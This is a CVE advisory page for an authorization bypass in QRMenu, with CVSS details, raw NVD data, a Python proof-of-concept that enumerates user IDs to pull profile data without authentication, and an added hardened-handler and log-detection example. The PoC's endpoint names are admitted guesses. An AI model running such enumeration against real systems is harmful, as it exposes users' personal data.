Security Vulnerability Report
CVE-2025-9902 CVSS 7.5 HIGH

Published: 2025-10-13 13:15:33
Last Modified: 2026-04-15 00:35:42

Description

Authorization Bypass Through User-Controlled Key vulnerability in AKIN Software Computer Import Export Industry and Trade Co. Ltd. QRMenu allows Privilege Abuse. This issue affects QRMenu: from 1.05.12 before Version dated 05.09.2025.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
(Network attack vector, low complexity, no privileges and no user interaction required; high confidentiality impact, no integrity or availability impact; exploitability 3.9, impact 3.6.)

Configurations (Affected Products)

No configuration data available.

QRMenu >= 1.05.12
QRMenu < Version dated 05.09.2025

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-9902 PoC - QRMenu Authorization Bypass
# Vulnerability: Authorization Bypass Through User-Controlled Key (CWE-639)
# Target: AKIN Software QRMenu < Version dated 05.09.2025
# NOTE: the endpoint and parameter names below are this PoC's own assumptions;
# the CVE description names neither.

import requests

TARGET_URL = "https://target-qrmenu.com"

# The vulnerable endpoint that accepts user-controlled key parameter
VULNERABLE_ENDPOINT = "/api/v1/user/profile"

# User-controlled parameter used for authorization (e.g., user_id)
USER_ID_PARAM = "user_id"


def exploit_authorization_bypass(target_user_id):
    """
    Exploit authorization bypass by manipulating user-controlled key.
    The server fails to verify that the requesting user has permission
    to access the specified user's data.
    """
    # Craft request with manipulated user_id parameter
    # No authentication required (PR:N)
    params = {
        USER_ID_PARAM: target_user_id,  # Attacker controls this value
        "lang": "en"
    }

    headers = {
        "User-Agent": "Mozilla/5.0 (compatible; QRMenuExploit/1.0)",
        "Accept": "application/json"
    }

    try:
        response = requests.get(
            f"{TARGET_URL}{VULNERABLE_ENDPOINT}",
            params=params,
            headers=headers,
            timeout=10
        )

        if response.status_code == 200:
            print(f"[+] Successfully accessed data for user_id: {target_user_id}")
            print(f"[+] Response: {response.text}")
            return response.json()
        else:
            print(f"[-] Failed with status code: {response.status_code}")
            return None

    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None


def enumerate_users(start_id=1, end_id=100):
    """
    Enumerate valid user IDs to harvest sensitive data.
    Demonstrates mass exploitation capability.
    """
    harvested_data = []

    for user_id in range(start_id, end_id + 1):
        data = exploit_authorization_bypass(user_id)
        if data:
            harvested_data.append({"user_id": user_id, "data": data})

    return harvested_data


if __name__ == "__main__":
    # Example: Access admin user's data by manipulating user_id to 1
    print("[*] Attempting authorization bypass on QRMenu...")
    result = exploit_authorization_bypass(1)

    if result:
        print("[!] Vulnerability confirmed - unauthorized data access successful")
```
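The following is an added defender-side example, not QRMenu's code and not part of this report. It shows the CWE-639 pattern the description names as a profile lookup that trusts a client-supplied key, beside a hardened version that resolves the principal from the session and ties the requested key to it, and adds a log check for the one-client-many-keys pattern the PoC's enumeration loop would produce. The user table, session tokens, parameter name and log lines are constructed; the `/api/v1/user/profile` path is the PoC's assumed endpoint, which the advisory does not confirm.

```python
import re
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample data (not QRMenu's schema): a user table and live sessions.
USERS = {
    1: {"user_id": 1, "email": "admin@example.test", "role": "admin"},
    2: {"user_id": 2, "email": "alice@example.test", "role": "user"},
    3: {"user_id": 3, "email": "bob@example.test", "role": "user"},
}
SESSIONS = {"sess-alice": 2, "sess-admin": 1}  # session token -> user_id


@dataclass
class Request:
    params: dict = field(default_factory=dict)  # query string: attacker-controlled
    session_token: Optional[str] = None         # cookie: server-issued


class Unauthorized(Exception):
    pass


class Forbidden(Exception):
    pass


def profile_vulnerable(req: Request) -> dict:
    """CWE-639 pattern: the record is selected purely by the client-supplied
    key, so any caller (even unauthenticated, matching PR:N) can read any user."""
    return USERS[int(req.params["user_id"])]


def current_user(req: Request) -> dict:
    """Resolve the principal from the session only, never from a parameter."""
    uid = SESSIONS.get(req.session_token or "")
    if uid is None:
        raise Unauthorized("no valid session")
    return USERS[uid]


def profile_hardened(req: Request) -> dict:
    """Authenticate first, then tie the requested key to the principal:
    a user may read only their own record unless their role permits more."""
    principal = current_user(req)
    requested = int(req.params.get("user_id", principal["user_id"]))
    if requested != principal["user_id"] and principal["role"] != "admin":
        raise Forbidden(f"user {principal['user_id']} may not read user {requested}")
    if requested not in USERS:
        raise KeyError("no such user")
    return USERS[requested]


def access_outcome(handler, req: Request) -> str:
    """Run a handler and summarise the result as 'ok', 'unauthorized' or 'forbidden'."""
    try:
        handler(req)
        return "ok"
    except Unauthorized:
        return "unauthorized"
    except Forbidden:
        return "forbidden"


# Detection side: an enumeration loop leaves one client reading many distinct
# user_id values in quick succession. Constructed Apache-style access log lines;
# the path is the PoC's assumed endpoint, not one taken from the advisory.
SAMPLE_LOG = [
    f'203.0.113.7 - - [13/Oct/2025:13:15:{i:02d} +0000] '
    f'"GET /api/v1/user/profile?user_id={i}&lang=en HTTP/1.1" 200 512 "-" "QRMenuExploit/1.0"'
    for i in range(1, 8)
] + [
    '198.51.100.9 - - [13/Oct/2025:13:16:00 +0000] '
    '"GET /api/v1/user/profile?user_id=2&lang=en HTTP/1.1" 200 498 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [13/Oct/2025:13:16:05 +0000] '
    '"GET /api/v1/user/profile?user_id=2&lang=tr HTTP/1.1" 200 498 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) .*"GET \S*[?&]user_id=(?P<uid>\d+)[^"]* HTTP/[\d.]+" (?P<status>\d{3})'
)


def flag_key_enumeration(log_lines, threshold: int = 5) -> list:
    """Return client IPs that successfully fetched more than `threshold` distinct
    user_id values; a legitimate session normally touches only its own record."""
    seen = defaultdict(set)
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and m.group("status") == "200":
            seen[m.group("ip")].add(m.group("uid"))
    return sorted(ip for ip, ids in seen.items() if len(ids) > threshold)


if __name__ == "__main__":
    anon = Request(params={"user_id": "1"})
    print("vulnerable handler, no session:", access_outcome(profile_vulnerable, anon))
    print("hardened handler, no session:  ", access_outcome(profile_hardened, anon))
    print("hardened, alice reads admin:   ",
          access_outcome(profile_hardened, Request({"user_id": "1"}, "sess-alice")))
    print("enumeration suspects:", flag_key_enumeration(SAMPLE_LOG))
```

The fix is not input validation on `user_id` but an ownership decision made against the authenticated principal: the key may be honoured only when it equals the principal's own id or when the principal's role is allowed to read other users. The log check is a coarse signal; in practice the threshold should be tuned to the application's normal per-session behaviour.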

References

https://www.usom.gov.tr/bildirim/tr-25-0333 (the reference listed in the CVE record below)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-9902",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-13T13:15:32.820",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Authorization Bypass Through User-Controlled Key vulnerability in AKIN Software Computer Import Export Industry and Trade Co. Ltd. QRMenu allows Privilege Abuse.This issue affects QRMenu: from 1.05.12 before Version dated 05.09.2025."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-639"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.usom.gov.tr/bildirim/tr-25-0333",
        "source": "[email protected]"
      }
    ]
  }
}
```